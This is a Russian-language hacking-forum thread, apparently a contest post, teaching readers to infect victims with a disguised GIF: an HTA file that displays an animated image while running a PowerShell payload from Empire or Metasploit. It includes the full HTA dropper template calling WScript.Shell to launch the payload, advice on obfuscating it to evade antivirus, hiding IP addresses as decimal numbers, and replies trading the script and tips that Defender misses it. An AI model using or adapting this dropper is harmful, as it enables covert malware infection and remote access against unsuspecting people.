Конкурс Злая GIF-ка или веселое заражение "клиентуры"

Всем привет, решил описать как мне кажется веселый метод заражения наших с вами "любимых клиентов" Все будет как Мы любим, весело, легко и без палевно)
Тема была предназначена для Грей-секции но она по каким то причинам упорно не хотела туда ложится по этому и было принято решение выложить сюда, хотя бы на конкурс и статья для него не последняя! Надеюсь..

Поехали!)

Идем искать картинку (живую) то есть gif-ку .. была выбрана

Ссылка скрыта от гостей

) далее нам по требуется код:

генерируем powershell в Empire или Metasploit я выбрал ..

>>><<<​

и вставляем в 37 строчку, между)

далее переходим на очень полезный онлайн

Ссылка скрыта от гостей

иногда кстати выручает для различного рода задач, например кодировке IP адреса в бинарник для последущего его скрытия, не множечко отступлю от темы покажу: например скрываем 127.0.0.1

127 = 1111111, 0 = 0 и 1 = 1 преобразовываем точки и получаем 01111111000000000000000000000001 = 2130706433 ИТОГ http: // 2130706433

так вот переводим нашу GIF-ку в формат base64, копируем полученную кодировочку и вставляем в

как видите в 17 строку)

Осталось последнее действие конвертировать, а точнее обфусцировать, то есть спрятать вредный код от антивирусов в этой замечательной

Ссылка скрыта от гостей

сохраняем полученный код в блокноте, под любым именем но в формате .hta < -- что это за формат, у нас написано здесь Пингвиныч, привет!)) "Решил я продолжит твою темку)"

Заключение: При запуске у жертвы появится Ваша злая GIF-ka c котикам или c ..уем), а к Вам прилетит заветная сессия) при желании можно иконку навесить (не знаю как, если кто знает, подскажите) и

ДЕТЕКТА НЕТ!!!

просьба) не тестить!

​

 

[mCstl]

благодарю. в gui все норм добавилось.

 

[Mitistofel]

>>> link removed<<<
Как я понял в этот скрипт нужно вставлять сгенирированную полезную нагрузку... Если так, то поделитесь кто нибуль этим скриптом, потому что он на данный момент по ссылке не доступен...

 

[valerian38]

>>> link removed<<<
Как я понял в этот скрипт нужно вставлять сгенирированную полезную нагрузку... Если так, то поделитесь кто нибуль этим скриптом, потому что он на данный момент по ссылке не доступен...

Держи
link removed

 

[Mitistofel]

Код от "unicorn" можно применить в этом способе?
Потому что когда я дошёл до момента с программой "Script Encoder".
То получил из этой же программы вот такое сообщение:

"Some corrections were made to script in the "After" window.
-4 semicolons were added to the script.

WARNING: Syntax error occured during parsing that may affect the resulting script in the "affter" window.

Do you want to place the curson into the location of the syntax error?
(You can ger more info about this error by going to View -> Last Syntax error)"

--------------------------------------------------------------------------------------------

"Некоторые исправления были внесены в сценарий в окне «После».
-4 точки с запятой были добавлены в скрипт.

ПРЕДУПРЕЖДЕНИЕ: при синтаксическом анализе произошла синтаксическая ошибка, которая может повлиять на результирующий скрипт в окне «affter».

Вы хотите поместить курсор в место синтаксической ошибки?
(Вы можете получить дополнительную информацию об этой ошибке, выбрав «Просмотр -> Последняя синтаксическая ошибка»)"

 

[sergvolk]

Держи
link removed

Почему ссылку на скрипт удалили?

 

[Сергей Попов]

Почему ссылку на скрипт удалили?

Она выдавала 404 ошибку

 

[id2746]

@Ondrik8, перезалей пожалуйста скрипт

 

[Ondrik8]

@Ondrik8, перезалей пожалуйста скрипт

уже Бро не актуален) палится, есть более продвинутые методики

 

[freez]

перезалейте посмотреть охота.

 

[Дима Шевцов]

уже Бро не актуален) палится, есть более продвинутые методики

Перезалей пж

 

[valerian38]

Перезалей пж

Ссылка скрыта от гостей

 

[Дима Шевцов]

Ссылка скрыта от гостей

Мне скрипт нужен

 

[valerian38]

Мне скрипт нужен

Ссылка скрыта от гостей

 

[Дима Шевцов]

Скрипт сделал всё вставил если кодируют его через Encoder то при открытие открывается только GIF а сессия не запускается если не кодировать то при открытие вылазиет ошибка сценария
Что делать?

 

[jonni_vu]

залейте скрипт

 

[jonni_vu]

Залейте скрипт пожалуйста. Нужен тест

 

[aRTIKa]

можно ссылочку на скрипт оч нужно посмотреть как работает.
для своего проекта

 

[Ondrik8]

<html>
<head>
<title>NazvanieGif</title>
<hta:application id="NazvanieGif"
border="thin"
borderstyle="complex"
maximizeButton="no"
minimizeButton="no"
/>
</head>
<script type="text/javascript">
var index = -1;
var images = [
"data:image/gif;base64,"];
function initGallery(){
window.resizeTo(300,300);
htaPayload();
nextPicture();
}
function nextPicture(){
var img;
index = index + 1;
if (index > images.length -1 ){
index = 0;
}
img = document.getElementById("gallery");
img.src = images[index];
}
function htaPayload(){
var payload="";
try{
if (navigator.userAgent.indexOf("Windows") !== -1){
new ActiveXObject("WScript.Shell").Run("CMD /C START /B " + payload, false);
}
}
catch(e){
}
}
</script>
<style>
#gallery, div {
width: 100%;
height: 100%;
}
#outer {
text-align: center;
}
#inner{
display: inline-block;
}
body {
background-color: black;
}
</style>
<body onload="initGallery()">
<div id="outer">
<div id="inner">
<img id="gallery" onclick="nextPicture()">
</div>
</div>
</body>
</html>

Вроде этот, уже не помню точно)

 

[Ondrik8]

до сих пор актуальная тема) Дефендр не палит! Нужно грамотно подобрать LoLBin

 

[qwertfh]

А ето я такой дурной или етой инфи просто нету я просто не могу понять куда вставлять код из powershell empire ведь КАКУЮ 37 строчу для етого ведь нужен еще какой-то код